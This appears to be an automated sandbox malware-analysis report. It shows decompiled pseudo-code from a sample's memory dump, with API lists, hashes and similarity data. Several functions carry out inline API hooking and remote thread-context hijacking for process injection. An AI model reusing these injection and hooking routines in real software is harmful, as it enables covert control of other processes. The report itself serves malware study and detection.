0x00407713
0x00407718
0x0040771a
0x00000000
0x00000000
0x0040771c
0x00000000
0x0040771c
0x004076e0
0x004076e0
0x004076e4
0x004076eb
0x004076eb
0x004076ee
0x004076f1
0x004076f1
0x00000000
0x004076e0
0x00000000
0x0040773f
0x004075f1
0x004075f1
0x004075f1
0x004075e4
0x00407748

APIs

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,00000000), ref: 00407595
PathCombineW.SHLWAPI(?,?,?,00000000), ref: 004075CA
PathCombineW.SHLWAPI(?,?,?), ref: 00407607
GetFileAttributesW.KERNEL32(?), ref: 00407619
GetPrivateProfileIntW.KERNEL32 ref: 00407697
GetPrivateProfileStringW.KERNEL32 ref: 004076C5

Part of subcall function 004188B0: PathCombineW.SHLWAPI(?,?,00000000,00407718,?,?), ref: 004188D1

Part of subcall function 00407750: PathCombineW.SHLWAPI(?,00000000,?,74B39600,00000000), ref: 00407789
Part of subcall function 00407750: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 004077AE
Part of subcall function 00407750: WriteFile.KERNEL32(00000000,?,00000146,?,00000000,74B396D0,00000000), ref: 004077EA
Part of subcall function 00407750: FlushFileBuffers.KERNEL32(00000000), ref: 0040782A
Part of subcall function 00407750: CloseHandle.KERNEL32(00000000), ref: 00407831
Part of subcall function 00407750: SetFileAttributesW.KERNEL32(?,00000080), ref: 00407847
Part of subcall function 00407750: DeleteFileW.KERNEL32(?), ref: 00407852

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Path$Combine$AttributesPrivateProfile$BuffersCloseCreateDeleteFlushFolderHandleStringWrite
String ID:
API String ID: 3306863732-0
Opcode ID: 206c51e1a98da3b724f8fc501e884838eeb9201c231c6063b71490ad67b3a7c1
Instruction ID: c16e94b22fdeb483b2d5438ffeaf8efbdd236a581d4ef31312b174f3bee3cc28
Opcode Fuzzy Hash: 206c51e1a98da3b724f8fc501e884838eeb9201c231c6063b71490ad67b3a7c1
Instruction Fuzzy Hash: 4841C372A083009AD7249720DC44BFB73A9EBC5350F50492EF695A32D0EB78B945C7AB

Uniqueness

Uniqueness Score: -1.00%

Function 00416FD0, Relevance: 9.1, APIs: 6, Instructions: 128
injectionCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00416FD0(void* __edi, void* _a8) {
				long _v0;
				intOrPtr _v4;
				struct _MEMORY_BASIC_INFORMATION _v36;
				long _v40;
				intOrPtr _v43;
				void _v44;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t34;
				void* _t41;
				intOrPtr* _t52;
				intOrPtr _t55;
				intOrPtr _t60;
				void* _t67;
				long _t68;
				long _t69;
				void* _t70;
				long* _t71;

				_t67 = __edi;
				_t71 =  &_v40;
				_t70 = _a8;
				_t68 = 0;
				_a8 = 0;
				if(VirtualQueryEx(0xffffffff, __edi,  &_v36, 0x1c) == 0 || _v36.State != 0x1000 || (_v36.Protect & 0x00000101) != 0) {
					L22:
					return _t68;
				} else {
					_t55 = _v36.RegionSize;
					_t34 = __edi - _v36.BaseAddress;
					if(_t55 <= _t34 || _t55 - _t34 < 0x1e || VirtualProtectEx(0xffffffff, __edi, 0x1e, 0x40,  &_v40) == 0) {
						goto L22;
					} else {
						_t63 =  &_v36;
						E00410870(_t35, _t63, 0xffffff90, 0x23);
						if(ReadProcessMemory(0xffffffff, __edi, _t63, 0x1e, 0) == 0) {
							L21:
							VirtualProtectEx(0xffffffff, _t67, 0x1e, _v40,  &_v40);
							goto L22;
						}
						_t52 =  &_v36;
						_push(0);
						_push(_t52);
						_t41 = E00428520(_t52, _t52, _t63, __edi, 0);
						if(_t41 == 0xffffffff) {
							L20:
							_t68 = _v0;
							goto L21;
						} else {
							while(1) {
								_t68 = _t68 + _t41;
								if(_t68 > 0x1e) {
									goto L20;
								}
								_t60 =  *_t52;
								if(_t60 == 0xe9 || _t60 == 0xe8) {
									if(_t41 == 5) {
										_t63 = _t67 - _t70;
										 *((intOrPtr*)(_t52 + 1)) =  *((intOrPtr*)(_t52 + 1)) + _t67 - _t70;
									}
								}
								_push(0);
								if(_t68 >= 5) {
									 *((char*)(_t71 + _t68 + 0x14)) = 0xe9;
									 *((intOrPtr*)(_t71 + _t68 + 0x15)) = _t67 - _t70 - 5;
									_t69 = _t68 + 5;
									if(WriteProcessMemory(0xffffffff, _t70,  &_v44, _t69, ??) != 0) {
										_v44 = 0xe9;
										_v43 = _v4 - _t67 - 5;
										E0041E4F0(_t67, _t70);
										if(WriteProcessMemory(0xffffffff, _t67,  &_v44, 5, 0) != 0) {
											_v0 = _t69;
										}
									}
									goto L20;
								}
								_t52 = _t71 + _t68 + 0x14;
								_push(_t52);
								_t41 = E00428520(_t52, _t60, _t63, _t67, _t68);
								if(_t41 != 0xffffffff) {
									continue;
								}
								goto L20;
							}
							goto L20;
						}
					}
				}
			}

0x00416fd0
0x00416fd0
0x00416fd4
0x00416fe1
0x00416fe5
0x00416ff1
0x0041713e
0x00417145
0x00417013
0x00417013
0x00417019
0x0041701f
0x00000000
0x0041704a
0x0041704e
0x00417053
0x00417069
0x00417129
0x00417138
0x00000000
0x00417138
0x00417070
0x00417074
0x00417077
0x00417078
0x00417080
0x00417124
0x00417124
0x00000000
0x00417086
0x00417090
0x00417090
0x00417095
0x00000000
0x00000000
0x0041709b
0x004170a0
0x004170aa
0x004170ae
0x004170b0
0x004170b0
0x004170aa
0x004170b3
0x004170b8
0x004170d8
0x004170dd
0x004170e1
0x004170f1
0x00417100
0x00417105
0x00417109
0x0041711e
0x00417120
0x00417120
0x0041711e
0x00000000
0x004170f1
0x004170ba
0x004170be
0x004170bf
0x004170c7
0x00000000
0x00000000
0x00000000
0x004170c9
0x00000000
0x00417090
0x00417080
0x0041701f

APIs

VirtualQueryEx.KERNEL32(000000FF,?,?,0000001C,?,00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000000,?,00000000), ref: 00416FE9
VirtualProtectEx.KERNEL32(000000FF,?,0000001E,00000040,?), ref: 0041703C
ReadProcessMemory.KERNEL32(000000FF,?,?,0000001E,00000000,?,00000090,00000023), ref: 00417061
WriteProcessMemory.KERNEL32(000000FF,?,?,-00000005,00000000,?,00000000,00000034,?,0000001E,00000000,?,00000090,00000023), ref: 004170ED
WriteProcessMemory.KERNEL32(000000FF,?,?,00000005,00000000,?,0000001E,00000000,?,00000090,00000023), ref: 0041711A
VirtualProtectEx.KERNEL32(000000FF,?,0000001E,?,?,?,0000001E,00000000,?,00000090,00000023), ref: 00417138

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: MemoryProcessVirtual$ProtectWrite$QueryRead
String ID:
API String ID: 390532180-0
Opcode ID: 5f73c79d4f6ff4dd20695abbf914155f170e0ae0e7380ae030a7986994e5d9b5
Instruction ID: 05684c7ae425e4c1ec781a217b4c407c4843b03b8e60d7174c983ccef31ab353
Opcode Fuzzy Hash: 5f73c79d4f6ff4dd20695abbf914155f170e0ae0e7380ae030a7986994e5d9b5
Instruction Fuzzy Hash: D34116316083517BCA20DE398D48EAB7BF89B89730F54471EF671863D0D674D888876A

Uniqueness

Uniqueness Score: -1.00%

Function 004193E0, Relevance: 9.1, APIs: 6, Instructions: 125
fileCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E004193E0(void** __esi, void** _a4, intOrPtr* _a8, intOrPtr _a12) {
				void* _v4;
				void* _v12;
				void* _v16;
				signed char _v20;
				void _v24;
				long _v28;
				void* __ebx;
				void* __edi;
				long _t32;
				union _LARGE_INTEGER _t36;
				long _t46;
				void* _t64;
				void** _t65;
				signed int _t66;

				_t65 = __esi;
				while(1) {
					_push(1);
					if(SetFilePointerEx( *_t65, 0, 0,  &_v16) == 0) {
						_t66 = _t66 | 0xffffffff;
						_v4 = _t66;
					} else {
						_t66 = _v16;
						_v4 = _v12;
					}
					if(ReadFile( *_t65,  &_v24, 5,  &_v28, 0) == 0) {
						break;
					}
					_t32 = _v28;
					if(_t32 == 0) {
						 *_a8 = 0;
						return 1;
					} else {
						if(_t32 != 5) {
							break;
						} else {
							_t36 = _v24 ^ _t65[4];
							_v24 = _t36;
							if(_t36 > 0xa00000) {
								break;
							} else {
								if((_v20 & 0x00000001) != 0 || _t36 == 0) {
									_push(1);
									if(SetFilePointerEx( *_t65, _t36, 0, 0) != 0) {
										continue;
									} else {
										return 0;
									}
								} else {
									_t64 = HeapAlloc( *0x42e6d4, 8, _t36 + 4);
									if(_t64 == 0) {
										break;
									} else {
										if(ReadFile( *_t65, _t64, _v24,  &_v28, 0) == 0) {
											L18:
											HeapFree( *0x42e6d4, 0, _t64);
											break;
										} else {
											_t49 = _v24;
											if(_v28 != _v24) {
												goto L18;
											} else {
												_t46 = E00419020(_a12, _t49, _t64);
												_v28 = _t46;
												if(_t46 == 0) {
													goto L18;
												} else {
													 *_a4 = _t64;
													 *_a8 = _t46;
													_t65[2] = _t66;
													_t65[3] = _v4;
													return 1;
												}
											}
										}
									}
								}
							}
						}
					}
					L20:
				}
				return 0;
				goto L20;
			}

0x004193e0
0x004193f0
0x004193f2
0x00419402
0x00419412
0x00419415
0x00419404
0x00419408
0x0041940c
0x0041940c
0x00419432
0x00000000
0x00000000
0x00419438
0x0041943e
0x0041948d
0x00419497
0x00419440
0x00419443
0x00000000
0x00419449
0x0041944d
0x00419450
0x00419459
0x00000000
0x0041945f
0x00419464
0x0041946c
0x00419478
0x00000000
0x0041947e
0x00419486
0x00419486
0x0041949a
0x004194ad
0x004194b1
0x00000000
0x004194b3
0x004194cb
0x00419509
0x00419512
0x00000000
0x004194cd
0x004194cd
0x004194d5
0x00000000
0x004194d7
0x004194db
0x004194e0
0x004194e6
0x00000000
0x004194e8
0x004194f0
0x004194f6
0x004194f8
0x004194fb
0x00419506
0x00419506
0x004194e6
0x004194d5
0x004194cb
0x004194b1
0x00419464
0x00419459
0x00419443
0x00000000
0x0041943e
0x00419520
0x00000000

APIs

SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,?,?,?,?,?), ref: 004193FE
ReadFile.KERNEL32(?,?,00000005,?,00000000,?,?,?,?,?), ref: 0041942A
SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,?), ref: 00419474

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Pointer$Read
String ID:
API String ID: 2010065189-0
Opcode ID: a692020e76975b26a13654b25d12813faf19110e570f83e1123829bd4a461392
Instruction ID: 98c380bb5468be66fe6e4a1e5805070e485ea6b58552d792b3a7d3c6a9e40188
Opcode Fuzzy Hash: a692020e76975b26a13654b25d12813faf19110e570f83e1123829bd4a461392
Instruction Fuzzy Hash: 25416B71204301AFD314CF56D890EABB7E9EBD8710F50892EF99097290DB35EC86CB26

Uniqueness

Uniqueness Score: -1.00%

Function 00419ED0, Relevance: 9.1, APIs: 6, Instructions: 109
threadsynchronizationinjectionCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00419ED0(void** _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, signed char _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44) {
				void** _v36;
				void** _v44;
				struct _CONTEXT _v768;
				void* __esi;
				intOrPtr _t30;
				long _t34;
				signed char _t44;
				void* _t45;
				void** _t58;
				intOrPtr _t59;
				signed int _t63;
				intOrPtr _t64;
				void* _t65;

				_t44 = _a32;
				_t64 = _a8;
				_t58 = _a4;
				_t30 =  *0x42e91c(_t58, _t64, _a12, _a16, _a20, _a24, _a28, _t44, _a36, _a40, _a44);
				_t59 = _t30;
				_v768.Dr0 = _t59;
				if(_t59 < 0 || (_t44 & 0x00000001) == 0 || _t58 == 0 || _t64 == 0) {
					return _t30;
				} else {
					if(WaitForSingleObject( *0x42edbc, 0) == 0) {
						L14:
						return _t59;
					}
					_t34 = GetProcessId( *_t58);
					_t71 = _t34;
					if(_t34 == 0) {
						goto L14;
					}
					_t65 = E0041CCB0(_t71, _t34);
					if(_t65 == 0) {
						goto L14;
					}
					_t45 = E0041CE60( *_t58, _t65, 0);
					_t63 = _t45 -  *0x42e90c + E0041D8F0;
					_v768.ContextFlags = 0x10003;
					if(GetThreadContext( *_v44,  &_v768) == 0 || _v768.EFlags !=  *0x42e924) {
						L12:
						VirtualFreeEx( *_t58, _t45, 0, 0x8000);
					} else {
						if(( *0x42e8f8 & 0x00000010) != 0) {
							_t63 = _t63 ^ _v768.Eip;
						}
						_v768.Eip = _t63;
						_v768.Dr1.ContextFlags = 0x10002;
						if(SetThreadContext( *_v36,  &(_v768.Dr1)) == 0) {
							goto L12;
						}
					}
					CloseHandle(_t65);
					return _v768.Dr0;
				}
			}

0x00419eec
0x00419ef5
0x00419efd
0x00419f32
0x00419f38
0x00419f3a
0x00419f40
0x0041a04e
0x00419f5f
0x00419f70
0x0041a042
0x00000000
0x0041a042
0x00419f79
0x00419f7f
0x00419f81
0x00000000
0x00000000
0x00419f8d
0x00419f91
0x00000000
0x00000000
0x00419fa8
0x00419fba
0x00419fc0
0x00419fd0
0x0041a019
0x0041a024
0x00419fe1
0x00419fe8
0x00419fea
0x00419fea
0x0041a000
0x0041a007
0x0041a017
0x00000000
0x00000000
0x0041a017
0x0041a02b
0x0041a03f
0x0041a03f

APIs

WaitForSingleObject.KERNEL32(?,00000000), ref: 00419F68
GetProcessId.KERNEL32(00000000), ref: 00419F79

Part of subcall function 0041CCB0: CreateMutexW.KERNEL32(0042E930,00000001,00000000,?,00000102,00000002,?,000001E6,?,0042EB80,000001E6,?,?,00000102,00000000), ref: 0041CD41
Part of subcall function 0041CCB0: GetLastError.KERNEL32(?,000001E6,?,0042EB80,000001E6,?,?,00000102,00000000), ref: 0041CD4D
Part of subcall function 0041CCB0: CloseHandle.KERNEL32(00000000,?,000001E6,?,0042EB80,000001E6,?,?,00000102,00000000), ref: 0041CD5B

Part of subcall function 0041CE60: DuplicateHandle.KERNEL32(000000FF,?,00000000,?,00000000,00000000,00000002,00000000,00000000,00000000,00000000,?,00000010), ref: 0041CE9B
Part of subcall function 0041CE60: WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,00000010), ref: 0041CED3
Part of subcall function 0041CE60: WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,00000010), ref: 0041CEF7
Part of subcall function 0041CE60: DuplicateHandle.KERNEL32(000000FF,?,00000000,?,00000000,00000000,00000002,?,00000010), ref: 0041CF25
Part of subcall function 0041CE60: WriteProcessMemory.KERNEL32(00000000,000004B0,?,00000004,00000000,?,00000010), ref: 0041CF38
Part of subcall function 0041CE60: DuplicateHandle.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000001,?,00000010), ref: 0041CF4E

GetThreadContext.KERNEL32(00000000,00000000), ref: 00419FC8
SetThreadContext.KERNEL32(?,00000000), ref: 0041A00F
VirtualFreeEx.KERNEL32(?,00000000,00000000,00008000), ref: 0041A024
CloseHandle.KERNEL32(00000000,?,00000000,00000000,00008000), ref: 0041A02B

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Handle$Process$DuplicateMemoryWrite$CloseContextThread$CreateErrorFreeLastMutexObjectSingleVirtualWait
String ID:
API String ID: 199599979-0
Opcode ID: 2522bbd70dfef54fa712c3c0c53d98b04c48da43ffe91d15ac0217bdf0412407
Instruction ID: 5253218a2d70581624539440a9c609992194c3e34a9ba0428862ef3d8fda61a1
Opcode Fuzzy Hash: 2522bbd70dfef54fa712c3c0c53d98b04c48da43ffe91d15ac0217bdf0412407
Instruction Fuzzy Hash: EC416D712053469BD334DF54DD88FABB7A8FB8C740F04452EFA4893251D779AC818B6A

Uniqueness

Uniqueness Score: -1.00%

Function 00419530, Relevance: 9.1, APIs: 6, Instructions: 95
fileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00419530(void** __esi) {
				signed int _v8;
				void* _v12;
				signed char _v16;
				void _v20;
				long _v24;
				union _LARGE_INTEGER _t38;
				void** _t59;

				_t59 = __esi;
				_t38 = 0;
				if((__esi[2] & __esi[3]) != 0xffffffff) {
					_push(1);
					if(SetFilePointerEx( *__esi, 0, 0,  &_v12) != 0 && (_v12 & _v8) != 0xffffffff) {
						_push(0);
						if(SetFilePointerEx( *__esi, __esi[2], __esi[3], 0) != 0) {
							if(ReadFile( *__esi,  &_v20, 5,  &_v24, 0) != 0 && _v24 == 5) {
								_v16 = _v16 | 0x00000001;
								if(E00418100(0,  *__esi, __esi[2], __esi[3]) != 0 && WriteFile( *__esi,  &_v20, 5,  &_v24, 0) != 0 && _v24 == 5) {
									FlushFileBuffers( *__esi);
									_t38 = 1;
								}
							}
							_push(0);
							SetFilePointerEx( *_t59, _v12, _v8, 0);
						}
					}
				}
				return _t38;
			}

0x00419530
0x00419540
0x00419546
0x0041954e
0x00419566
0x00419585
0x00419590
0x004195ab
0x004195bc
0x004195cd
0x004195f4
0x004195fa
0x004195fa
0x004195cd
0x00419606
0x0041960d
0x0041960d
0x00419590
0x00419566
0x00419616

APIs

SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001), ref: 00419562
SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0041958C
ReadFile.KERNEL32(?,?,00000005,?,00000000), ref: 004195A3
SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,00000005,?,00000000), ref: 0041960D

Part of subcall function 00418100: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,00419240,?,00000000,?,?,00000000), ref: 00418112

WriteFile.KERNEL32(?,?,00000005,?,00000000,?,?,?,?,?), ref: 004195E0
FlushFileBuffers.KERNEL32(?,?,?,00000005,?,00000000,?,?,?,?,?), ref: 004195F4

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Pointer$BuffersFlushReadWrite
String ID:
API String ID: 2654796190-0
Opcode ID: 7691ef1c3d730a3abbd39d3c1acb3fb3a9d845bb1f5fff1586ceb5e4d88c6963
Instruction ID: 8095ae20fc1a4646d0c39d8b082c0b01b9a4ac2dc8f3a1352905e55eb63e8fe9
Opcode Fuzzy Hash: 7691ef1c3d730a3abbd39d3c1acb3fb3a9d845bb1f5fff1586ceb5e4d88c6963
Instruction Fuzzy Hash: C1314971200301AFE724DF64CC95F67B3EAAB84720F148A1EF9A197290D674EC85CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00423620, Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 94
memoryCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00423620(struct _CRITICAL_SECTION* _a4) {
				void* _t19;
				void* _t21;
				void* _t25;
				signed short _t31;
				signed int _t44;
				intOrPtr* _t50;

				_t50 = _a4;
				_t44 = 0;
				if(_t50 == 0 ||  *_t50 == 0) {
					L7:
					EnterCriticalSection(0x42ede8);
					_t31 = ( *0x42ede4 & 0x0000ffff) + _t44;
					if(_t31 <= 0x3e8) {
						if(E00410740(_t31 + _t31, 0x42eddc) != 0) {
							E00410820( *0x42eddc + ( *0x42ede4 & 0x0000ffff) * 2, _t50, _t44 + _t44);
							 *0x42ede4 = _t31;
						}
					} else {
						_t19 =  *0x42eddc;
						_push(0x7d4);
						if(_t19 != 0) {
							_t21 = HeapReAlloc( *0x42e6d4, 8, _t19, ??);
						} else {
							_t21 = HeapAlloc( *0x42e6d4, 8, ??);
						}
						if(_t21 != 0) {
							 *0x42eddc = _t21;
							E00410820(_t21, _t21 + (( *0x42ede4 & 0x0000ffff) - 0x3e8 - _t44) * 2, 0x7d0);
							E00410820(0x7d0 +  *0x42eddc, _t50, _t44 + _t44);
							 *0x42ede4 = 0x3e8;
						}
					}
					_a4 = 0x42ede8;
					return LeaveCriticalSection(??);
				} else {
					do {
						_t44 = _t44 + 1;
					} while ( *((short*)(_t50 + _t44 * 2)) != 0);
					if(_t44 <= 0x3e8) {
						goto L7;
					} else {
						EnterCriticalSection(0x42ede8);
						_t25 =  *0x42eddc;
						if(_t25 != 0) {
							HeapFree( *0x42e6d4, 0, _t25);
						}
						 *0x42eddc = 0;
						 *0x42ede4 = 0;
						_a4 = 0x42ede8;
						return LeaveCriticalSection(??);
					}
				}
			}

0x00423621
0x00423626
0x0042362a
0x00423689
0x00423690
0x0042369d
0x004236a5
0x0042372a
0x00423742
0x00423747
0x00423747
0x004236a7
0x004236a7
0x004236ac
0x004236b3
0x004236cf
0x004236b5
0x004236be
0x004236be
0x004236d7
0x004236f2
0x004236f7
0x00423708
0x00423712
0x00423712
0x004236d7
0x00423752
0x0042375a
0x00423632
0x00423632
0x00423632
0x00423633
0x00423641
0x00000000
0x00423643
0x00423648
0x0042364e
0x00423655
0x00423660
0x00423660
0x00423669
0x00423673
0x0042367b
0x00423683
0x00423683
0x00423641

APIs

EnterCriticalSection.KERNEL32(0042EDE8,?,?,004239B2,?), ref: 00423648
HeapFree.KERNEL32(?,00000000,?,?,?,004239B2,?), ref: 00423660
EnterCriticalSection.KERNEL32(0042EDE8,?,?,?,?,004239B2,?), ref: 00423690
HeapAlloc.KERNEL32(?,00000008,000007D4,?,?,?,?,004239B2,?), ref: 004236BE
HeapReAlloc.KERNEL32(?,00000008,?,000007D4,?,?,?,?,004239B2,?), ref: 004236CF

Strings

B, xrefs: 00423752

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocCriticalEnterSection$Free
String ID: B
API String ID: 2574396306-3806887055
Opcode ID: aa6929fe1946cdf6e39f5eda5832efb5362380deec4694b7157f30b47ce73641
Instruction ID: f37a4168a01fcecf5927478e9a721e909238b51b62607e188658851c13f31b36
Opcode Fuzzy Hash: aa6929fe1946cdf6e39f5eda5832efb5362380deec4694b7157f30b47ce73641
Instruction Fuzzy Hash: 8D31D071700211ABD7209F56FD88AA733BCEB84705F84853BF501D7260EB78A946CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040D240, Relevance: 9.1, APIs: 6, Instructions: 93
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D240() {
				void _t12;
				void* _t15;
				void* _t16;
				void _t18;
				void* _t26;
				void* _t27;

				_t27 = HeapAlloc( *0x42e6d4, 8, 0x334);
				if(_t27 == 0) {
					L20:
					return 0;
				} else {
					_t26 = HeapAlloc( *0x42e6d4, 8, 0x334);
					if(_t26 == 0) {
						goto L20;
					} else {
						 *_t27 = 1;
						 *(_t27 + 0x32c) = 0x42e7f0;
						 *_t26 = 0;
						 *(_t26 + 0x32c) = 0x42e7f0;
						if( *0x42e7f0 < 0x40) {
							if(E0040CEE0 == 0) {
								L8:
								_t18 = 1;
							} else {
								_t16 = CreateThread(0, 0, E0040CEE0, _t27, 0, 0);
								if(_t16 != 0) {
									 *(0x42e7f4 + ( *0x42e7f0 & 0x000000ff) * 4) = _t16;
									 *0x42e7f0 =  *0x42e7f0 + 1;
									goto L8;
								} else {
									_t18 = 0;
								}
							}
						} else {
							SetLastError(0x9b);
							_t18 = 0;
						}
						if( *0x42e7f0 < 0x40) {
							if(E0040CEE0 == 0) {
								L15:
								_t12 = 1;
							} else {
								_t15 = CreateThread(0, 0, E0040CEE0, _t26, 0, 0);
								if(_t15 != 0) {
									 *(0x42e7f4 + ( *0x42e7f0 & 0x000000ff) * 4) = _t15;
									 *0x42e7f0 =  *0x42e7f0 + 1;
									goto L15;
								} else {
									_t12 = 0;
								}
							}
						} else {
							SetLastError(0x9b);
							_t12 = 0;
						}
						if(_t18 != 0 || _t12 != 0) {
							return 1;
						} else {
							return 0;
						}
					}
				}
			}

0x0040d257
0x0040d25b
0x0040d350
0x0040d353
0x0040d261
0x0040d271
0x0040d275
0x00000000
0x0040d27b
0x0040d280
0x0040d283
0x0040d28a
0x0040d28d
0x0040d2a1
0x0040d2b9
0x0040d2e7
0x0040d2e7
0x0040d2bb
0x0040d2c9
0x0040d2cd
0x0040d2da
0x0040d2e1
0x00000000
0x0040d2cf
0x0040d2cf
0x0040d2cf
0x0040d2cd
0x0040d2a3
0x0040d2a8
0x0040d2ae
0x0040d2ae
0x0040d2f0
0x0040d308
0x0040d336
0x0040d336
0x0040d30a
0x0040d318
0x0040d31c
0x0040d329
0x0040d330
0x00000000
0x0040d31e
0x0040d31e
0x0040d31e
0x0040d31c
0x0040d2f2
0x0040d2f7
0x0040d2fd
0x0040d2fd
0x0040d33c
0x0040d34e
0x0040d343
0x0040d346
0x0040d346
0x0040d33c
0x0040d275

APIs

HeapAlloc.KERNEL32(?,00000008,00000334,00000000,00000000,0041D676,0042E7F0,00000000,00000104), ref: 0040D255
HeapAlloc.KERNEL32(?,00000008,00000334), ref: 0040D26F
SetLastError.KERNEL32(0000009B,?,00000010), ref: 0040D2A8
CreateThread.KERNEL32 ref: 0040D2C9
SetLastError.KERNEL32(0000009B,?,00000010), ref: 0040D2F7
CreateThread.KERNEL32 ref: 0040D318

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocCreateErrorHeapLastThread
String ID:
API String ID: 3580101977-0
Opcode ID: 757b3dbb6c3b49d1bb4ef64bcc431667ffde5e853f205505721640e77b51621b
Instruction ID: 113441ecf620b1ff8bc75dac57876e34efd06c42e4e9c895a971e4934d57afb4
Opcode Fuzzy Hash: 757b3dbb6c3b49d1bb4ef64bcc431667ffde5e853f205505721640e77b51621b
Instruction Fuzzy Hash: 4B214730B80351A7E73017F67D02BA37B899BA2740F550077F940BB2D0E2F9A806875D

Uniqueness

Uniqueness Score: -1.00%

Function 00416F00, Relevance: 9.1, APIs: 6, Instructions: 83
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00416F00(int __ecx, intOrPtr* __edx, struct tagPOINT _a4, signed int _a8) {
				int _v4;
				long _v8;
				struct HWND__* _t12;
				long _t16;
				long _t17;
				void* _t23;
				int _t37;
				struct HWND__* _t39;
				intOrPtr* _t40;

				_t37 = __ecx;
				_push(_a8);
				_t40 = __edx;
				_v4 = __ecx;
				_t12 = WindowFromPoint(_a4.x);
				_t39 = _t12;
				if(_t39 == 0) {
					return _t12;
				} else {
					_t16 = SendMessageTimeoutW(_t39, 0x84, 0, (_a8 & 0x0000ffff) << 0x00000010 | _a4.x & 0x0000ffff, 2, _t37,  &_v8);
					if(_t16 != 0) {
						_t17 = _v8;
						if(_t17 != 0xffffffff) {
							if(_t40 != 0) {
								 *_t40 = _t17;
							}
							return _t39;
						}
						SetWindowLongW(_t39, 0xfffffff0, GetWindowLongW(_t39, 0xfffffff0) | 0x08000000);
						_t23 = E00416F00(_v4, _t40, _a4, _a8);
						SetWindowLongW(_t39, 0xfffffff0, GetWindowLongW(_t39, 0xfffffff0) & 0xf7ffffff);
						return _t23;
					} else {
						return _t16;
					}
				}
			}

0x00416f0b
0x00416f11
0x00416f13
0x00416f15
0x00416f19
0x00416f1f
0x00416f23
0x00416fc5
0x00416f29
0x00416f49
0x00416f51
0x00416f5d
0x00416f64
0x00416fb7
0x00416fb9
0x00416fb9
0x00000000
0x00416fbc
0x00416f80
0x00416f92
0x00416fa7
0x00416fb2
0x00416f5a
0x00416f5a
0x00416f5a
0x00416f51

APIs

WindowFromPoint.USER32(?,?), ref: 00416F19
SendMessageTimeoutW.USER32 ref: 00416F49
GetWindowLongW.USER32(00000000,000000F0), ref: 00416F6F
SetWindowLongW.USER32 ref: 00416F80
GetWindowLongW.USER32(00000000,000000F0), ref: 00416F9C
SetWindowLongW.USER32 ref: 00416FA7

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

